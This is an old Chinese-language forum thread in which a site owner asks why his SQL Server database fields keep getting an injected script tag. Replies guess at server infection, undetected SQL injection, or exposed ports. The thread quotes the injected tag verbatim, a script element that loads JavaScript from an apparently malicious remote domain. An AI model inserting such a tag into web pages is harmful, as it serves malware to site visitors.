SQLServer数据库数据总被恶习意修改是什么原因?

楼主 xxh 于 2008-06-14 17:41:49
SQLServer数据库数据总被恶习意修改是什么原因?
[SIZE=2]我的网站服务器,是ASP的,数据库是SQLSERVER的,最近SQL数据库中的某些数据表的个别字段总是被截断并追赶加内容为<script src=http://www.[COLOR=#c60a00]fengnima[/SIZE].cn/k.js></script>的恶意代码。网站的ASP文件一点也没有被破坏,也没有看到什么新文件产生。ASP文件没有SQL注入的问题,网站服务也仅开放了80端口,网站WEB日志中也没有看到什么异常。请大家帮助分析一下,可能是什么原因呢?(注:数据库与WEB程序是同一机器上的)[/COLOR]
回复
1楼 xyxp 于 2008-06-14 20:05:09
最可能是你服务器中毒了,不排除旁注可能
另外就是你站点有sql注入漏洞但是未被你发现的
回复
2楼 xxh 于 2008-06-16 10:32:08
谢谢楼上的回复,虽然你的答复没有超出我的想象!
回复
3楼 xyxp 于 2008-06-17 06:51:14
我不是服务器管理员,再说你只给出了故障情况
并没有受损数据库及相应的系统、数据库服务器日志
所以,只能给出最常也最有可能出现的可能性
当然还有一种可能是对方直接通过1433端口连接Sqlserver
如果是我所管理的服务器,这个问题会在第一时间被解决
回复
4楼 xxh 于 2008-06-17 08:27:29
直接通过1433端口连接Sqlserver?
服务器用Tcp/IP筛选只开了80端口呀?而且硬件防火墙只开了80端口呀
顺便说下:我不是网管,业余的,呵呵.
回复
5楼 bosom 于 2008-07-03 21:28:09
不可能,那你的SQL也要开放端口啊!
从情况来看,我觉得毒机率大些,看一下是不是网站能上传的地方有运行权限
回复
12  

电脑版 Page created in 0.0859 seconds with 4 queries.